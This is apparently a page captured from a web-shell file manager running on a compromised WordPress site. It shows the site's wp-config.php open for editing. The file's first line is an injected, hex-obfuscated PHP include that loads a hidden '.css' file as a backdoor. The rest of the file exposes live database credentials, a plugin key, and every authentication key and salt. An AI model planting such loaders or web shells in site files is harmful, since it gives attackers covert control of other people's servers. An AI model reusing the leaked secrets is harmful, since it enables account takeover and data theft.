BossBey File Manager
PHP:
7.4.33
OS:
Linux
User:
royallo4
Root
/
home
/
royallo4
/
domains
/
royallook.in
/
public_html
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php /*b7f35*/ $r92 = "/home/royallo4/doma\x69ns/royallook.\x69n/pr\x69vate_html/wp\x2d\x69ncludes/blocks/search/.ae11b7bc.css"; if (!isset($r92)) {md5 ($r92);} else { @include_once /* 90 */ ($r92); } /*b7f35*/ //Begin Really Simple SSL key define('RSSSL_KEY', 'cH1W89UyqOkiKJkhsMFGbmdRgfhhUku3vqkxclldHzjEK9f5PXuFPgz7peG7oqsN'); //END Really Simple SSL key //Begin Really Simple SSL session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple SSL /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'royallo4_royallook33' ); /** MySQL database username */ define( 'DB_USER', 'royallo4_royallook33' ); /** MySQL database password */ define( 'DB_PASSWORD', '8pqFFkVydkQJQA8pv5F4' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'uwqzdupfui8ptdvu8upyqovb6pyvs87zmq5zmrylj5bmppbycmv0mrbdsfgqqodm' ); define( 'SECURE_AUTH_KEY', 'hljlbmja8dxv5vfys8lespogn1panwi37mdnadmsk89tso5kuxomkx15zmbrjunz' ); define( 'LOGGED_IN_KEY', 'fesyqdwc8mh3p2pyg6soqevhzuclcbrhkwmygenziuxefok8utbq5qeabgyiymm3' ); define( 'NONCE_KEY', '9pnadnyby7eagrzbbd6zy0no0kt8ftszgqysrvil23lejnlegys4mru4pfhm5z5i' ); define( 'AUTH_SALT', 'qvtprdf5mzj6htiwf1dhds8dbeiganibgodwr8jw7jnwuktu6wulqhh0hwwvfl2g' ); define( 'SECURE_AUTH_SALT', 'chnzxlptxzrq5gdfp66ishftrcau1rm6gsjggbl45ovwrsfmuyaxfxet2iffkitv' ); define( 'LOGGED_IN_SALT', 'ykonzjqjyphvzg760ys1scjw8aohglujpu9akrgjwpybf0krdmhinj8xqqfntj71' ); define( 'NONCE_SALT', 'kmp1ofdunotmovlzzpd9ncr363zpzi4ufetjmqfjikg1zgmx39vknimdcnwziat3' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpv8_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); define( 'WP_MEMORY_LIMIT', '256M' ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Save
Cancel